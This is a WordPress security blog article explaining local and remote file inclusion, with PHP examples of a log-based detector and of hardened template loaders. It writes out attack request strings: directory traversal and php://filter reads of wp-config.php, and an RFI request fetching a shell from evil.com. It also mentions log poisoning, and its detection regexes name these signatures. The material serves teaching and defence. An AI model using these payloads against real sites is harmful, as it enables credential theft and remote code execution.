File Inclusion Vulnerabilities in WordPress: LFI and RFI Explained

File inclusion vulnerabilities allow attackers to read sensitive files or execute malicious code on your WordPress server. Learn how LFI and RFI attacks work.

WPSentry Team · March 8, 2026 · 2 min read

What Are File Inclusion Vulnerabilities?

File inclusion vulnerabilities occur when an application dynamically includes files based on user-controlled input without proper validation. There are two types:

  • Local File Inclusion (LFI) — Reading or executing files already on the server
  • Remote File Inclusion (RFI) — Including and executing files from an external server

In WordPress, these bugs most often appear in plugins and themes that build a path for include() or require() (or their _once variants) from unsanitized request input. The same pattern with read-only functions such as file_get_contents() or readfile() gives an arbitrary file read (path traversal) rather than code execution; the disclosure impact is the same, so both are covered below.

Local File Inclusion (LFI)

LFI lets an attacker make the application open any file the web server process can read. A typical vulnerable template loader looks like this:

// Vulnerable plugin code: the request value is concatenated straight into the path
$template = $_GET['template'];
include(plugin_dir_path(__FILE__) . 'templates/' . $template);

// Attacker request (four ../ climb from templates/ up to the WordPress root):
?template=../../../../wp-config.php

By using directory traversal (../), the attacker reaches wp-config.php, which contains the database credentials, the authentication keys and salts, and the table prefix. Note that include() executes a PHP file rather than printing it, so this request runs wp-config.php in the plugin's context instead of displaying it. To read the source, attackers wrap the path in the php://filter stream wrapper (for example ?template=php://filter/convert.base64-encode/resource=../../../../wp-config.php), which returns the file base64-encoded instead of executing it; php://filter works with include() regardless of the allow_url_include setting. Non-PHP targets such as /etc/passwd are simply written into the response as-is.

What Attackers Can Access via LFI

  • wp-config.php — Database credentials, secret keys, table prefix
  • /etc/passwd — System user accounts (Linux servers)
  • .htaccess — Server configuration and rewrite rules
  • Web server and PHP log files — These may contain sensitive data, and an attacker who can write to them (for example by sending PHP code in a User-Agent header) can then include the log to execute it (log poisoning)
  • Other plugin/theme files — Source code that reveals more vulnerabilities

Remote File Inclusion (RFI)

RFI is more dangerous because it allows the attacker to execute their own code on your server:

// Vulnerable code
$page = $_GET['page'];
include($page . ".php");

// Attacker request (the server fetches and runs https://evil.com/shell.php):
?page=https://evil.com/shell

The server fetches and executes the attacker's PHP file, giving them full control. Note: RFI requires allow_url_include to be On (which in turn requires allow_url_fopen to be On). allow_url_include has shipped Off by default since it was introduced in PHP 5.2 and has been deprecated since PHP 7.4, so RFI is rare on maintained hosts.

Prevention Strategies

For Site Owners

  1. Keep PHP updated — allow_url_include has been Off by default since PHP 5.2 and deprecated since 7.4; current releases also lack older include() tricks such as null-byte path truncation, fixed in PHP 5.3.4
  2. Update plugins and themes — File inclusion vulnerabilities are regularly patched, and an unpatched plugin is the usual entry point
  3. Use a WAF — Firewalls can block common traversal and wrapper signatures (../, %2e%2e/, php://) in request parameters; treat this as defence in depth, since encoding variants and application-specific payloads can get through
  4. File permissions — Keep wp-config.php unreadable by other local users (chmod 400 or 440). This protects against neighbours on a shared host, not against LFI itself: the vulnerable code runs as the web server user, which must be able to read wp-config.php anyway
  5. Disable directory listing — Add Options -Indexes to your .htaccess so an attacker cannot browse plugin directories for template names and include targets
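The signatures a WAF or a log review looks for are easier to understand with a concrete detector. The following PHP script is an added example, not part of the original article or of any product: it parses constructed access-log lines, percent-decodes each query string (twice, so double-encoded traversal is caught too) and reports which LFI/RFI patterns match. The pattern names, the regular expressions and the sample log are assumptions made for this demonstration.

```php
<?php
// Added example, not part of the original article: the request signatures a
// WAF or a log review looks for in LFI/RFI attempts, run over constructed
// access-log lines. Pattern names and the sample log are assumptions for the
// demonstration, not output from any real product.
declare(strict_types=1);

// Signatures checked against the percent-decoded query string.
const LFI_PATTERNS = [
    'traversal'   => '#\.\.[/\\\\]#',                                // ../ or ..\
    'sensitive'   => '#wp-config\.php|/etc/passwd|\.htaccess#i',
    'php_wrapper' => '#\b(?:php|data|phar|expect|zip)://#i',
    'remote_url'  => '#=\s*(?:https?|ftp)://#i',                     // RFI style
];

// Decode percent-encoding up to twice so that both %2e%2e%2f and the
// double-encoded %252e%252e%252f collapse to ../ before matching.
function normalise_query(string $query): string {
    $prev = null;
    for ($i = 0; $i < 2 && $query !== $prev; $i++) {
        $prev = $query;
        $query = urldecode($query);
    }
    return $query;
}

// Names of the patterns that match one request target ("/path?query").
function classify_request(string $target): array {
    $q = strpos($target, '?');
    $query = $q === false ? '' : substr($target, $q + 1);
    $decoded = normalise_query($query);
    $hits = [];
    foreach (LFI_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) $hits[] = $name;
    }
    return $hits;
}

// Minimal parser for Combined Log Format lines.
function parse_access_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';
    if (!preg_match($re, $line, $m)) return null;
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4], 'status' => (int)$m[5]];
}

// Constructed sample log: one benign request, then LFI and RFI attempts.
$sample_log = <<<'LOG'
203.0.113.7 - - [08/Mar/2026:10:01:02 +0000] "GET /?template=list HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Mar/2026:10:01:05 +0000] "GET /?template=../../../../wp-config.php HTTP/1.1" 200 0 "-" "curl/8.5.0"
203.0.113.7 - - [08/Mar/2026:10:01:09 +0000] "GET /?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2101 "-" "curl/8.5.0"
203.0.113.7 - - [08/Mar/2026:10:01:12 +0000] "GET /?template=php://filter/convert.base64-encode/resource=../../../../wp-config.php HTTP/1.1" 200 4480 "-" "curl/8.5.0"
198.51.100.2 - - [08/Mar/2026:10:02:30 +0000] "GET /?page=https://evil.example/shell HTTP/1.1" 500 0 "-" "python-requests/2.31"
LOG;

foreach (explode("\n", $sample_log) as $line) {
    $req = parse_access_line($line);
    if ($req === null) continue;
    $hits = classify_request($req['target']);
    printf("%-13s %-4s %3d %-60s %s\n", $req['ip'], $req['method'], $req['status'],
        substr($req['target'], 0, 60), $hits ? 'ALERT ' . implode(',', $hits) : 'ok');
}
```

Run it with php on the command line. The first sample line is reported as ok, the traversal and php://filter lines as traversal/sensitive (plus php_wrapper for the filter request), and the last as remote_url. Decoding twice is deliberate: it catches double-encoded traversal that a single-decode filter misses, at the cost of occasional false positives on legitimate values that contain a literal %25, which is an acceptable trade for an alerting rule.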

For Developers

  1. Never use user input in file paths — Map the request value to a fixed allowlist of templates and include only the mapped file; reject anything not on the list
  2. Use basename() — $template = basename($_GET['template']); strips the directory part, so ../ traversal no longer works, but it still lets the attacker pick any file in that directory; combine it with an allowlist, or with a fixed extension plus a realpath() containment check
  3. Set open_basedir — Restrict PHP file access to the WordPress directory (a php.ini or per-vhost setting, so coordinate with your host). It blocks /etc/passwd and log files outside the tree, but not wp-config.php, which lives inside it
  4. Disable allow_url_include — In php.ini, ensure this is set to Off; unless a plugin genuinely needs to open remote URLs, set allow_url_fopen = Off as well
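The vulnerable loader from the LFI section and the developer advice above fit in one runnable script. The following PHP is an added example, not code from the original article or from any real plugin: it places the vulnerable pattern beside an allowlist version and a realpath() containment version, then feeds each a legitimate value and three hostile ones. The function names, the template set and the temporary directory it creates are assumptions made for this demonstration.

```php
<?php
// Added example, not code from the original article or from any real plugin:
// the vulnerable loader from the LFI section beside two hardened versions.
// Function names, the template set and the temporary directory layout are
// assumptions made for this demonstration.
declare(strict_types=1);

// Build a throwaway plugin directory so the script runs offline.
$base = sys_get_temp_dir() . '/myplugin-' . bin2hex(random_bytes(4));
mkdir("$base/templates", 0700, true);
file_put_contents("$base/templates/list.php", "<?php return 'list template';");
file_put_contents("$base/templates/grid.php", "<?php return 'grid template';");
file_put_contents("$base/secret.php", "<?php return 'SECRET: must never be included';");

// Vulnerable: request input concatenated straight into the include path.
function load_template_vulnerable(string $base, string $template) {
    return include "$base/templates/" . $template;
}

// Hardened, primary control: an explicit allowlist mapping request values to
// files. Nothing the user sent ever reaches the filesystem call.
const ALLOWED_TEMPLATES = ['list' => 'list.php', 'grid' => 'grid.php'];

function load_template_allowlist(string $base, string $template) {
    if (!array_key_exists($template, ALLOWED_TEMPLATES)) {
        return false; // unknown name: serve a default, log it, or return 400
    }
    return include "$base/templates/" . ALLOWED_TEMPLATES[$template];
}

// Hardened, defence in depth for a genuinely dynamic set of files: append a
// fixed extension, resolve with realpath() and verify the result is still
// inside the templates directory. basename() alone is weaker: it strips ../
// but still lets any file in that directory be included.
function load_template_contained(string $base, string $template) {
    if (strpos($template, "\0") !== false) return false;               // null byte
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $template)) return false; // php://, http://, data:
    $dir = realpath("$base/templates");
    if ($dir === false) return false;
    $path = realpath($dir . '/' . $template . '.php');
    if ($path === false) return false;                                 // no such template
    if (strncmp($path, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return false;                                                  // escaped the directory
    }
    return include $path;
}

// Constructed request values: one legitimate, three hostile.
$payloads = [
    'list',
    '../secret',
    '../secret.php',
    'php://filter/convert.base64-encode/resource=../secret',
];
echo "vulnerable('../secret.php') => ",
    var_export(load_template_vulnerable($base, '../secret.php'), true), "\n";
foreach ($payloads as $p) {
    printf("%-58s allowlist=%-16s contained=%s\n", $p,
        var_export(load_template_allowlist($base, $p), true),
        var_export(load_template_contained($base, $p), true));
}

// Clean up the temporary files.
foreach (["$base/templates/list.php", "$base/templates/grid.php", "$base/secret.php"] as $f) unlink($f);
rmdir("$base/templates");
rmdir($base);
```

The vulnerable loader happily returns the contents of secret.php outside its directory; both hardened loaders return false for every hostile value and only 'list' succeeds. The allowlist is the control to prefer, because it never interprets user input as a path at all; the realpath() version exists for the case where templates are discovered at runtime, and it rejects wrapper schemes explicitly because realpath() does not understand them and would otherwise let php://filter through.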

Frequently Asked Questions

What is the difference between LFI and RFI?

Local File Inclusion (LFI) allows attackers to read or execute files already on the server (like wp-config.php), while Remote File Inclusion (RFI) allows attackers to include and execute files from an external server, giving them full control. RFI is more dangerous but requires allow_url_include to be enabled in PHP.

What can attackers access through LFI?

Through LFI, attackers can access wp-config.php (database credentials and secret keys), /etc/passwd (system user accounts), .htaccess (server configuration), log files, and other plugin/theme source code that may reveal additional vulnerabilities.

How do file inclusion vulnerabilities occur in WordPress?

File inclusion vulnerabilities occur in plugins and themes that pass unsanitized user input to PHP's include() or require(); the same mistake with file_get_contents() yields an arbitrary file read. Attackers use directory traversal (../) to navigate outside intended directories and access sensitive files.

How can I protect my WordPress site from file inclusion attacks?

Keep PHP updated, update plugins and themes regularly, use a WAF that detects directory traversal patterns, set wp-config.php to chmod 400 or 440, disable directory listing, and use open_basedir to restrict PHP file access to the WordPress directory.

Is RFI still a threat?

RFI is less common because PHP disables allow_url_include by default. However, LFI remains a significant threat as it doesn't require this setting and can still expose sensitive configuration files and credentials.
